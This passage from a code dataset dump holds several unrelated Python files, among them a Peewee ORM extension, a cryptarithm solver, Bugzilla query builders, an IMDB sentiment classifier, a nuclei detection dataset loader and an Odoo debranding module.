ventanas\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"code/py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"65051864","text":"\"\"\"Peewee ORM hacking\"\"\"\nimport re\n\nimport peewee\nimport playhouse\n\nimport lasagna.utils.helpers as helpers\n\n\nclass EnumField(peewee.Field):\n \"\"\"Enum field\n\n define an enum field in your model like this:\n EnumField(choices=['a', 'b', 'c'])\n \"\"\"\n db_field = 'enum'\n\n def pre_field_create(self, _):\n \"\"\"Create the enum type\"\"\"\n field = 'e_%s' % self.name\n\n self.get_database().get_conn().cursor().execute(\n 'DROP TYPE IF EXISTS %s;' % field\n )\n\n query = self.get_database().get_conn().cursor()\n tail = ', '.join([\"'%s'\"] * len(self.choices)) % tuple(self.choices)\n q = 'CREATE TYPE %s AS ENUM (%s);' % (field, tail)\n query.execute(q)\n\n def post_field_create(self, _):\n \"\"\"Once creation succeed register the enum name as field name\"\"\"\n self.db_field = 'e_%s' % self.name\n\n def __ddl_column__(self, _):\n return peewee.SQL('e_%s' % self.name)\n\n def db_value(self, value):\n if value not in self.choices:\n raise ValueError('Invalid Enum Value \"%s\"' % value)\n return str(value)\n\n\nclass DirectionField(peewee.Field):\n \"\"\"Custom database direction field (postgres custom type)\"\"\"\n db_field = 'direction'\n\n def db_value(self, value):\n return '(\"%s\", \"%s\")' % (value[0], value[1])\n\n def python_value(self, value):\n title, text = value.strip('()').split(',')\n\n title = title.strip('\"')\n text = text.strip('\"')[1:]\n return helpers.Direction(title, text)\n\n\nclass ArrayField(playhouse.postgres_ext.ArrayField):\n \"\"\"Improved peewee ArrayField\n\n As peewee does not handle correctly the indexing of array, this extending\n fix this behaviour.\n Additionnaly, it supports complex type insertion without explicit casting\n (only first level, nested aren't supported).\n \"\"\"\n parser = re.compile(r'\\(.*?\\)')\n default_index_type = None\n\n def db_value(self, value):\n def stringify(elt):\n \"\"\"Stringifies an array element\n\n If the element is a complex object it is returned as a jointure\n of its attrs\n If the element is a string, simply return as is\n \"\"\"\n if helpers.is_iterable(elt):\n return '\"(%s)\"' % ', '.join(elt)\n else:\n return str(elt)\n\n return '{%s}' % ', '.join(\n stringify(elt) for elt in super(ArrayField, self).db_value(value)\n )\n\n def python_value(self, value):\n if isinstance(value, str):\n values = [value.replace('\\\\\"', '\"')\n for value in self.parser.findall(value)]\n else:\n values = value\n\n return [self.__field.python_value(value) for value in values]\n","sub_path":"lasagna/lasagna/db/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"627184573","text":"# sheldon woodward\n# 5/10/18\n\n\nclass Crpyto:\n def __init__(self, w_0, w_1, w_2):\n self.stack = {}\n self.word = ''\n word_length = 0\n if len(w_0) > word_length:\n word_length = len(w_0)\n if len(w_1) > word_length:\n word_length = len(w_1)\n if len(w_2) > word_length:\n word_length = len(w_2)\n\n w_0 = w_0[::-1]\n w_1 = w_1[::-1]\n w_2 = w_2[::-1]\n for i in range(word_length - len(w_0)):\n w_0 += ' '\n for i in range(word_length - len(w_1)):\n w_1 += ' '\n for i in range(word_length - len(w_2)):\n w_2 += ' '\n\n for a, b, c in zip(w_0, w_1, w_2):\n self.word += a\n self.word += b\n self.word += c\n\n self.stack[' '] = 0\n\n def solve(self):\n # print(self.word)\n self._recursive(0)\n\n def _recursive(self, index, carry=0):\n # print(str(self.stack) + ' ' + str(index))\n if not index < len(self.word) and carry == 0:\n print(self._without_space())\n return False\n if not index < len(self.word):\n return False\n\n let = self.word[index]\n new_carry = 0\n\n if let not in self.stack:\n if index % 3 != 2:\n for val in range(10):\n if val not in self._without_space().values():\n self.stack[let] = val\n # print('push: ' + str(self.stack))\n if self._recursive(index + 1, carry):\n return True\n else:\n self.stack.pop(list(self.stack.keys())[-1])\n # print(' pop: ' + str(self.stack))\n else:\n return False\n\n else:\n val = self.stack[self.word[index - 2]] + self.stack[self.word[index - 1]] + carry\n if val > 9:\n # print('CARRY: ' + str(val))\n new_carry = int(val / 10)\n val = val % 10\n if val not in self.stack.values():\n self.stack[let] = val\n # print('push: ' + str(self.stack))\n if self._recursive(index + 1, new_carry):\n return True\n else:\n self.stack.pop(list(self.stack.keys())[-1])\n # print(' pop: ' + str(self.stack))\n return False\n else:\n return False\n\n else:\n if index % 3 != 2:\n if self._recursive(index + 1, carry):\n return True\n else:\n return False\n\n else:\n val = self.stack[self.word[index - 2]] + self.stack[self.word[index - 1]] + carry\n if val > 9:\n # print('CARRY: ' + str(val))\n new_carry = int(val / 10)\n val = val % 10\n if val == self.stack[let]:\n if self._recursive(index + 1, new_carry):\n return True\n else:\n return False\n else:\n return False\n\n def _without_space(self):\n r = dict(self.stack)\n del r[' ']\n return r\n","sub_path":"send_more_money/Crypto.py","file_name":"Crypto.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"266490352","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nClass for dealing with POS data from MacMorpho.\n\"\"\"\n\nfrom ..reader import TaggerReader\n\nclass MacMorphoReader(TaggerReader):\n \"\"\"\n This class reads data from the MacMorpho corpus and turns it into a format\n readable by the neural network for the POS tagging task.\n \"\"\"\n \n def __init__(self, sentences=None, filename=None):\n \"\"\"\n 'param tagged_text: a sequence of tagged sentences. Each sentence must be a \n sequence of (token, tag) tuples. If None, the sentences are read from the \n default location.\n \"\"\"\n self.task = 'pos'\n self.rare_tag = None\n \n if sentences is not None:\n self.sentences = sentences\n else:\n self.sentences = []\n \n if filename is not None:\n with open(filename, 'rb') as f:\n for line in f:\n items = unicode(line, 'utf-8').split()\n self.sentences.append([item.split('_') for item in items])\n \n\n def get_inverse_tag_dictionary(self):\n \"\"\"\n Returns a version of the tag dictionary useful for consulting\n the meaning of the network's output.\n \"\"\"\n tuples = [(x[1], x[0]) for x in self.tag_dict.iteritems()]\n ret = dict(tuples)\n \n return ret\n \n","sub_path":"nlpnet/pos/macmorphoreader.py","file_name":"macmorphoreader.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"279672204","text":"from sys import maxsize\n\ndef matrix_mul(p, i, j, dp):\n if dp[i][j] < maxsize: return dp[i][j]\n if i == j: return 0\n q = maxsize\n for k in range(i, j):\n t = matrix_mul(p, i, k, dp) + matrix_mul(p, k + 1, j, dp) + p[i - 1] * p[k] * p[j]\n if q > t:\n s[i][j] = k\n q = t\n dp[i][j] = q\n return q\n\n\ndef parenthesize(s, i, j):\n if i == j:\n return \"A{}\".format(i)\n else:\n return \"({}{})\".format(parenthesize(s, i, s[i][j]), parenthesize(s, s[i][j] + 1, j))\n\np = [30, 35, 15, 5, 10, 20, 25]\ns, dp = [[0 for _ in range(len(p))] for _ in range(len(p))], [[maxsize for _ in range(len(p))] for _ in\n range(len(p))]\nprint(matrix_mul(p, 1, len(p) - 1, dp))\nprint(parenthesize(s, 1, len(p) - 1))\n","sub_path":"dp/matrix_mul.py","file_name":"matrix_mul.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"3389001","text":"# encoding: utf8\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('jobs', '__first__'),\n ('orgs', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Application',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('job', models.ForeignKey(to='jobs.Job', verbose_name='job', to_field='id')),\n ('organization', models.ForeignKey(to='orgs.Organization', verbose_name='organization', to_field='id')),\n ],\n options={\n 'unique_together': set([('job', 'organization')]),\n 'verbose_name': 'application',\n 'verbose_name_plural': 'applications',\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"jobchaser/jobchaser/tracker/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"257102161","text":"INCLUDE_FIELDS = '&include_fields=id,component,classification,' \\\n 'creation_time,last_change_time,is_open,priority,' \\\n 'severity,status,summary,assigned_to,creator,resolution,' \\\n 'dupe_of,target_milestone,see_also'\n\n\ndef firefox_release_42(limit=10):\n return '&limit={}&order=Bug%20Number&' \\\n 'target_milestone=mozilla42&' \\\n 'target_milestone=Firefox%2042&' \\\n 'status=RESOLVED&status=VERIFIED&status=CLOSED&' \\\n 'query_format=advanced'.format(limit)\n\n\ndef thunderbird_releases_32_to_39(limit=10):\n return '&limit={}&&order=Bug%20Number&' \\\n 'status=RESOLVED&status=VERIFIED&status=CLOSED&' \\\n 'target_milestone=Thunderbird%2032.0&target_milestone=Thunderbird%2033.0&' \\\n 'target_milestone=Thunderbird%2034.0&target_milestone=Thunderbird%2035.0&' \\\n 'target_milestone=Thunderbird%2036.0&target_milestone=Thunderbird%2037.0&' \\\n 'target_milestone=Thunderbird%2038.0&target_milestone=Thunderbird%2039.0&' \\\n 'query_format=advanced'.format(limit)\n\n\ndef thunderbird_release_38(limit=10):\n return 'limit={}&order=Bug%20Number&' \\\n 'chfield=bug_status&' \\\n 'chfieldfrom=2015-06-11&' \\\n 'chfieldto=2016-05-31&' \\\n 'bug_status=RESOLVED&' \\\n 'bug_status=VERIFIED&' \\\n 'bug_status=CLOSED&' \\\n 'product=Thunderbird&' \\\n 'query_format=advanced'.format(limit)\n\n\ndef kde_plasma_release_5dot5(limit=10):\n return 'limit={}&order=Bug%20Number&' \\\n 'bug_status=RESOLVED&' \\\n 'resolution=FIXED&resolution=INVALID&' \\\n 'resolution=WONTFIX&resolution=LATER&' \\\n 'resolution=REMIND&resolution=WORKSFORME&' \\\n 'resolution=MOVED&resolution=UPSTREAM&' \\\n 'resolution=DOWNSTREAM&resolution=WAITINGFORINFO&' \\\n 'resolution=BACKTRACE&resolution=UNMAINTAINED&' \\\n 'chfield=bug_status&' \\\n 'chfieldfrom=2015-08-25&' \\\n 'chfieldto=2016-03-22&' \\\n 'chfieldvalue=RESOLVED&' \\\n 'known_name=Plasma5-All-Critical&' \\\n 'product=Baloo&product=Breeze&product=kde-cli-tools&product=kde-gtk-config&' \\\n 'product=kded-appmenu&product=kdeplasma-addons&product=kfontview&' \\\n 'product=khelpcenter&product=khotkeys&product=kinfocenter&product=kio-extras&' \\\n 'product=klipper&product=kmenuedit&product=knetattach&product=krunner&' \\\n 'product=ksmserver&product=ksplash&product=ksshaskpass&product=kstart&' \\\n 'product=ksysguard&product=kwin&product=kwrited&product=muon&' \\\n 'product=Plasma%20Workspace%20Wallpapers&product=plasma-mediacenter&' \\\n 'product=plasma-nm&product=plasmashell&product=Powerdevil&' \\\n 'product=systemsettings&product=Touchpad-KCM&' \\\n 'product=user-manager&query_based_on=Plasma5-All-Critical&' \\\n 'query_format=advanced'.format(limit)\n\n\n\n\n\ndef query_from_to(from_date, to_date, limit=0):\n severity = ['blocker', 'critical', 'major', 'normal', 'minor', 'trivial']\n resolution = ['FIXED', 'INVALID', 'WONTFIX', 'DUPLICATE', 'WORKSFORME', 'INCOMPLETE', 'SUPPORT', 'EXPIRED', 'MOVED']\n # product = 'Firefox%20for%20Android'\n product = 'Firefox'\n # product = 'Thunderbird'\n # product = 'Calendar'\n status = 'RESOLVED'\n\n partial_query = []\n for s in severity:\n query = Query()\n query.severity = s\n\n partial_query.append(query)\n\n for r in resolution:\n query = Query()\n query.resolution = r\n\n partial_query.append(query)\n\n q = Query()\n q.limit = limit\n q.product = product\n q.status = status\n partial_query.append(q)\n\n result = '&'.join([str(query) for query in partial_query])\n return result + '&chfieldfrom=' + from_date + '&chfieldto=' + to_date\n\n\nclass Query(object):\n\n @property\n def 
component(self):\n return self._component\n\n @component.setter\n def component(self, component):\n self._component = component\n\n @property\n def creation_time(self):\n return self._creation_time\n\n @creation_time.setter\n def creation_time(self, creation_time):\n self._creation_time = creation_time\n\n @property\n def last_change_time(self):\n return self._last_change_time\n\n @last_change_time.setter\n def last_change_time(self, last_change_time):\n self._last_change_time = last_change_time\n\n @property\n def status(self):\n return self._status\n\n @status.setter\n def status(self, status):\n self._status = status\n\n @property\n def product(self):\n return self._product\n\n @product.setter\n def product(self, product):\n self._product = product\n\n @property\n def severity(self):\n return self._severity\n\n @severity.setter\n def severity(self, severity):\n self._severity = severity\n\n @property\n def limit(self):\n return self._limit\n\n @limit.setter\n def limit(self, limit):\n self._limit = limit\n\n @property\n def resolution(self):\n return self._resolution\n\n @resolution.setter\n def resolution(self, resolution):\n self._resolution = resolution\n\n def __str__(self):\n criteria = [\n '{}={}'.format(key[1:], value) for (key, value) in self.__dict__.items() if value is not None\n ]\n\n criteria.sort()\n return '&'.join(criteria)\n","sub_path":"patterny/patterny/bugzilla/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"127961574","text":"\"\"\"PyTorch optimizer builders.\"\"\"\n\nimport torch\n\n\nOPTIMIZER_BUILDER_DICT = {}\n\n\ndef register_builder(func):\n \"\"\"Register optimizer builder.\"\"\"\n OPTIMIZER_BUILDER_DICT[func.__name__] = func\n return func\n\n\n@register_builder\ndef sgd(parameters, args):\n \"\"\"Build SGD.\"\"\"\n return torch.optim.SGD(\n parameters,\n lr=args.lr,\n weight_decay=args.weight_decay,\n )\n\n\n@register_builder\ndef adam(parameters, args):\n \"\"\"Build adam.\"\"\"\n return torch.optim.Adam(\n parameters,\n lr=args.lr,\n weight_decay=args.weight_decay,\n betas=(args.beta1, args.beta2),\n )\n\n\n@register_builder\ndef adadelta(parameters, args):\n \"\"\"Build adadelta.\"\"\"\n return torch.optim.Adadelta(\n parameters,\n rho=args.rho,\n eps=args.eps,\n weight_decay=args.weight_decay,\n )\n","sub_path":"espnet/optimizer/pytorch.py","file_name":"pytorch.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"229706750","text":"from parlai.core.build_data import download_models\nfrom parlai.core.params import ParlaiParser\nfrom examples.interactive import interactive\nfrom parlai.agents.language_model.language_model import LanguageModelAgent\n\n'''Interact with pre-trained model\nLanguage model trained on Opensubtitles 2018 dataset\nRun from ParlAI directory\n'''\n\nif __name__ == '__main__':\n parser = ParlaiParser(add_model_args=True)\n parser.add_argument('-d', '--display-examples', type='bool', default=False)\n LanguageModelAgent.add_cmdline_args(parser)\n parser.set_defaults(\n dict_file='models:personachat/language_model/opensubtitles2018.dict',\n sampling_mode=True,\n task='parlai.agents.local_human.local_human:LocalHumanAgent',\n model='language_model',\n model_file='models:personachat/language_model/languagemodel_esz512_hid1024_nl2.pt'\n )\n\n\n opt = parser.parse_args()\n opt['model_type'] = 'language_model' # for builder\n # build all profile memory models\n fnames = ['languagemodel_esz512_hid1024_nl2.pt',\n 'opensubtitles2018.dict']\n download_models(opt, fnames, 'personachat')\n\n interactive(opt)\n","sub_path":"projects/personachat/scripts/languagemodel_opensub2018_interactive.py","file_name":"languagemodel_opensub2018_interactive.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"326298361","text":"#!/usr/bin/env python3\n# @Time : 2018/10/8 8:25 AM\n# @Author : yuxuecheng\n# @Contact : yuxuecheng@xinluomed.com\n# @Site : \n# @File : imdb_bayes.py\n# @Software: PyCharm\n# @Description IMDB影评得分估计竞赛编码 链接:https://www.kaggle.com/c/word2vec-nlp-tutorial\n\n# 导入pandas用于读取和写入数据操作\nimport pandas as pd\n# 从bs4导入BeautifulSoup用于整理原始文本\nfrom bs4 import BeautifulSoup\n# 导入正则表达式工具包\nimport re\n# 从nltk.corpus里导入停用词列表\nfrom nltk.corpus import stopwords\n# 导入文本特性抽取器CountVectorizer与TfidfVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n# 从scikit-learn中导入朴素贝叶斯模型\nfrom sklearn.naive_bayes import MultinomialNB\n# 导入Pipeline用于方便搭建系统流程\nfrom sklearn.pipeline import Pipeline\n# 导入GridSearchCV用于超参数组合的网格搜索\nfrom sklearn.model_selection import GridSearchCV\n\n# 从本地读入训练和测试数据集\ntrain = pd.read_csv('../../Datasets/IMDB/labeledTrainData.tsv', delimiter='\\t')\ntest = pd.read_csv('../../Datasets/IMDB/testData.tsv', delimiter='\\t')\n\n# 查验一下前几条训练数据\nprint(train.head())\n\n# 查验一下前几条测试数据\nprint(test.head())\n\n\n# 定义review_to_text函数,完成对原始评论的三项数据预处理任务\ndef review_to_text(review, remove_stopwords):\n # 任务一:去掉html标记\n raw_text = BeautifulSoup(review, features='html').get_text()\n # 任务二:去掉非字母字符\n letters = re.sub('[^a-zA-Z]', ' ', raw_text)\n words = letters.lower().split()\n # 任务三:如果remove_words被激活,则进一步去掉评论中的停用词\n if remove_stopwords:\n stop_words = set(stopwords.words('english'))\n words = [w for w in words if w not in stop_words]\n\n # 返回每条评论经此三项预处理任务的词汇列表\n return words\n\n\n# 分别对原始训练和测试数据集上进行上述三项预处理\nX_train = []\nfor review in train['review']:\n X_train.append(' '.join(review_to_text(review, True)))\n\nX_test = []\nfor review in test['review']:\n X_test.append(' '.join(review_to_text(review, True)))\n\ny_train = train['sentiment']\n\n# 使用Pipeline搭建两组使用朴素贝叶斯模型的分类器,区别在于分别使用CountVectorizer与TfidfVectorizer对文本特征进行抽取\npip_count = Pipeline(\n [\n ('count_vec', CountVectorizer(analyzer='word')),\n ('mnb', MultinomialNB())\n ]\n)\npip_tfidf = Pipeline(\n [\n ('tfidf_vec', TfidfVectorizer(analyzer='word')),\n ('mnb', MultinomialNB())\n ]\n)\n\n# 分别配置用于模型超参数搜索的组合\nparams_count = {\n 'count_vec__binary': [True, False],\n 'count_vec__ngram_range': [(1, 1), (1, 2)],\n 'mnb__alpha': [0.1, 1.0, 10.0]\n}\nparams_tfidf = {\n 'tfidf_vec__binary': [True, False],\n 'tfidf_vec__ngram_range': [(1, 1), (1, 2)],\n 'mnb__alpha': [0.1, 1.0, 10.0]\n}\n\n# 使用采用4折交叉验证的方法对使用CountVectorizer的朴素贝叶斯模型进行并行化超参数搜索\ngs_count = GridSearchCV(pip_count, params_count, cv=4, n_jobs=-1, verbose=1)\ngs_count.fit(X_train, y_train)\n\n# 输出交叉验证中最佳的准确性得分以及超参数组合\nprint(gs_count.best_score_)\nprint(gs_count.best_params_)\n\n# 以最佳的超参数组合配置模型并对测试数据进行预测\ncount_y_predict = gs_count.predict(X_test)\n\n# 使用采用4折交叉验证的方法对使用TfidfVectorizer的朴素贝叶斯模型进行并行化超参数搜索\ngs_tfidf = GridSearchCV(pip_tfidf, params_tfidf, cv=4, n_jobs=-1, verbose=1)\ngs_tfidf.fit(X_train, y_train)\n\n# 输出交叉验证中最佳的准确性得分以及超参数组合\nprint(gs_tfidf.best_score_)\nprint(gs_tfidf.best_params_)\n\n# 以最佳的超参数组合配置模型并对测试数据进行预测\ntfidf_y_predict = gs_tfidf.predict(X_test)\n\n# 使用pandas对需要提交的数据进行格式化\nsubmission_count = pd.DataFrame(\n {\n 'id': test['id'],\n 'sentiment': count_y_predict\n }\n)\nsubmission_tfidf = pd.DataFrame(\n {\n 'id': test['id'],\n 'sentiment': tfidf_y_predict\n }\n)\n\n# 结果输出到本地硬盘\nsubmission_count.to_csv('../../Datasets/IMDB/submission_count.csv', index=False)\nsubmission_tfidf.to_csv('../../Datasets/IMDB/submission_tfidf.csv', 
index=False)\n\n\n\n\n\n\n\n\n\n","sub_path":"PythonMachineLearningAndKaggle/ch04/imbd/imdb_bayes.py","file_name":"imdb_bayes.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"376651751","text":"\n\n#calss header\nclass _EUROPE():\n\tdef __init__(self,): \n\t\tself.name = \"EUROPE\"\n\t\tself.definitions = [u'the continent that is to the east of the Atlantic Ocean, to the north of the Mediterranean, and to the west of Asia', u'the European Union', u'the continent of Europe without including the UK']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_europe.py","file_name":"_europe.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"514053388","text":"from selenium import webdriver\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.webdriver.common.by import By\nfrom lib.pageObjects.login import login\nimport time\nclass Logout:\n def __init__(self,driver):\n self.driver = driver\n\n\n def logout(self):\n logout=self.driver.find_element(By.XPATH,\"html/body/div[3]/div/ul/li[15]/a\")\n logout.click()\n try:\n self.driver.switch_to.alert.accept()\n print('Alert occur')\n except NoAlertPresentException:\n print('No alter present')\n time.sleep(3)\n\n self.driver.close()\n\n","sub_path":"lib/pageObjects/logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"652439664","text":"from tkinter import *\n\nroot = Tk()\nprompt = StringVar()\nroot.title(\"AVATAR\")\nlabel = Label(root, fg=\"dark green\")\nlabel.pack()\n\nframe = Frame(root,background='red')\nframe.pack()\n\n# Function definition\n\n# first create the canvas\ncanvas = Canvas(height=200,width=200)\ncanvas.pack()\n\ndef Image1():\n canvas.delete(\"all\")\n image1 = PhotoImage(file = \"rapports.png\")\n canvas.create_image(0,0,anchor='nw',image=image1)\n canvas.image = image1\n\ndef Image2():\n canvas.delete(\"all\")\n image1 = PhotoImage(file = \"report.png\")\n canvas.create_image(0,0,anchor='nw',image=image1)\n canvas.image = image1\n\n#Invoking through button\nTextWindow = Label(frame,anchor = NW, justify = LEFT, bg= 'white', fg = 'blue', textvariable = prompt, width = 75, height=20)\nTextWindow.pack(side = TOP)\n\nconversationbutton = Button(frame, text='Start Conversation',width=25,fg=\"green\",command = Image1)\nconversationbutton.pack(side = RIGHT)\n\nstopbutton = Button(frame, text='Stop',width=25,fg=\"red\",command = Image2)\nstopbutton.pack(side = RIGHT)\n\nroot.mainloop()\n","sub_path":"gui/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"487962835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: coco.py\n\nimport os\nimport config\nfrom nuclei import NucleiDataset\n\nfrom tensorpack.utils.timer import timed_operation\n\n\n__all__ = ['COCODetection', 'COCOMeta']\n\nCOCO_NUM_CATEGORY = 1\nconfig.NUM_CLASS = COCO_NUM_CATEGORY + 1\n\n\nclass _COCOMeta(object):\n INSTANCE_TO_BASEDIR = {\n 'stage1_train': 'stage1_train',\n 'stage1_test': 'stage1_test'\n }\n\n def valid(self):\n return hasattr(self, 'cat_names')\n\n def create(self, cat_ids, cat_names):\n \"\"\"\n cat_ids: list of ids\n cat_names: list of names\n \"\"\"\n assert not self.valid()\n assert len(cat_ids) == COCO_NUM_CATEGORY and len(cat_names) == COCO_NUM_CATEGORY\n self.cat_names = cat_names\n self.class_names = ['BG'] + self.cat_names\n\n # background has class id of 0\n self.category_id_to_class_id = {\n v: i + 1 for i, v in enumerate(cat_ids)}\n self.class_id_to_category_id = {\n v: k for k, v in self.category_id_to_class_id.items()}\n config.CLASS_NAMES = self.class_names\n\n\nCOCOMeta = _COCOMeta()\n\n\nclass COCODetection(object):\n def __init__(self, basedir, name, mode=None):\n \"\"\"\n mode: train or val\n \"\"\"\n assert name in COCOMeta.INSTANCE_TO_BASEDIR.keys(), name\n self.name = name\n # data/stage1_train\n self._imgdir = os.path.join(basedir, COCOMeta.INSTANCE_TO_BASEDIR[name])\n assert os.path.isdir(self._imgdir), self._imgdir\n\n # initialize the meta\n cat_ids = [1]\n cat_names = ['nuclei']\n if not COCOMeta.valid():\n COCOMeta.create(cat_ids, cat_names)\n else:\n assert COCOMeta.cat_names == cat_names\n \n self.coco = NucleiDataset(self._imgdir, mode)\n\n def load(self):\n \"\"\"\n Args:\n add_gt: whether to add ground truth bounding box annotations to the dicts\n add_mask: whether to also add ground truth mask\n\n Returns:\n a list of dict, each has keys including:\n 'height', 'width', 'id', 'file_name',\n and (if add_gt is True) 'boxes', 'class', 'is_crowd', and optionally\n 'segmentation'.\n \"\"\"\n with timed_operation('Load Groundtruth Boxes for {}'.format(self.name)):\n \n # list of dict, each has keys: \n #id\n #file_name: data/stage1_train/dec1764c00e8b3c4bf1fc7a2fda341279218ff894186b0c2664128348683c757/images/dec1764c00e8b3c4bf1fc7a2fda341279218ff894186b0c2664128348683c757.png\n #mask_dir: data/stage1_train/dec1764c00e8b3c4bf1fc7a2fda341279218ff894186b0c2664128348683c757/masks/\n #name: dec1764c00e8b3c4bf1fc7a2fda341279218ff894186b0c2664128348683c757\n \n # determined after load image and masks:\n #height,width\n #boxes nx4\n #class n, always >0\n #is_crowd # n\n imgs = self.coco.image_info\n \n for img in imgs:\n img['file_name'] = img['path'] # abosolute file name.\n return imgs\n\n @staticmethod\n def load_many(basedir, names, mode=None):\n \"\"\"\n Load and merges several instance files together.\n\n Returns the same format as :meth:`COCODetection.load`.\n \"\"\"\n if not isinstance(names, (list, tuple)):\n names = [names]\n ret = []\n for n in names:\n coco = COCODetection(basedir, n, mode=None)\n ret.extend(coco.load())\n return ret\n\n\nif __name__ == '__main__':\n c = COCODetection('data', 'stage1_train', 'train')\n imgs = c.load()\n print(\"#Images:\", len(imgs))\n \n c = COCODetection('data', 'stage1_train', 'val')\n imgs = c.load()\n print(\"#Images:\", len(imgs))\n","sub_path":"examples/Nuclei/coco.py","file_name":"coco.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"199413493","text":"# __author__ = 'truongdung'\nfrom openerp import fields, models, api\nimport os\n\n\nclass GTSDebrandingConf(models.Model):\n _name = 'gts.debranding.conf'\n\n x_active = fields.Boolean(string=\"Active\")\n x_power_by = fields.Char(string=\"Power By\")\n x_logo = fields.Binary(string=\"Logo\")\n x_icon = fields.Binary(string=\"Icon\")\n x_title = fields.Char(string=\"Title\")\n x_hide_usermenu_help = fields.Boolean(string=\"Hide Help\")\n x_hide_usermenu_odoosuport = fields.Boolean(string=\"Hide Odoo Support\")\n\n @api.model\n def read_write_conf(self):\n value = self.search([('x_active', '=', True)], limit=1)\n my_conf = {}\n if len(value) > 0:\n for k in value._all_columns.keys():\n if k.find('x_') >= 0:\n if k == 'x_logo' and value[k]:\n fh = open('%s/%s' % (os.path.dirname(__file__), 'static/src/img/company_logo.gif'), 'wb')\n fh.write(value[k].decode('base64'))\n fh.close()\n elif k == 'x_icon' and value[k]:\n fh = open('%s/%s' % (os.path.dirname(__file__), 'static/src/img/favicon.ico'), 'wb')\n fh.write(value[k].decode('base64'))\n fh.close()\n my_conf[k.replace(\"x_\", \"\")] = value[k]\n f = open('%s/%s' % (os.path.dirname(__file__), 'controllers/abc.dung'), 'r+')\n all_conf = eval(f.read() or \"{}\")\n f.seek(0)\n f.truncate()\n all_conf[self.env.cr.dbname] = my_conf\n f.write(str(all_conf))\n f.close()\n\n @api.multi\n def write(self, vals):\n res = super(GTSDebrandingConf, self).write(vals)\n self.read_write_conf()\n return res\n\n @api.model\n def create(self, vals):\n res = super(GTSDebrandingConf, self).create(vals)\n self.read_write_conf()\n return res\n\nGTSDebrandingConf()\n","sub_path":"erp_digital_platform/addons/gts_debranding_conf/debranding_conf.py","file_name":"debranding_conf.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"60661229","text":"import re\nimport hashlib\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = ('png', 'jpg', 'jpeg', 'shoto')\nTRANSLITERATION_DICTIONARY = {\n 'а':'a','б':'b','в':'v','г':'g','ґ':'g','д':'d',\n 'е':'e','є':'e','э':'e','ë':'yo','ж':'zh','з':'z',\n 'и':'i','ы':'y','і':'i','ї':'i','й':'i','к':'k',\n 'л':'l','м':'m','н':'n','о':'o','п':'p','р':'r',\n 'с':'s','т':'t','у':'u','ф':'f','х':'h','ц':'ts',\n 'ч':'ch','ш':'sh','щ':'shch','ь':'','ю':'iu','я':'ia'\n}\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef prepare_name(name):\n temp_name = []\n trans_dict = TRANSLITERATION_DICTIONARY.keys()\n for char in name.lower():\n if char in trans_dict:\n temp_name.append(TRANSLITERATION_DICTIONARY[char])\n else:\n temp_name.append(char)\n return secure_filename(''.join(temp_name))\n\ndef getPathSegment(filename):\n m = hashlib.md5()\n m.update(filename.encode('utf-8'))\n return m.hexdigest()[:3]\n\ndef isSegment(string):\n return re.fullmatch(r'[0-9a-f]{3}', string)\n\ndef isResizedImage(filename):\n return 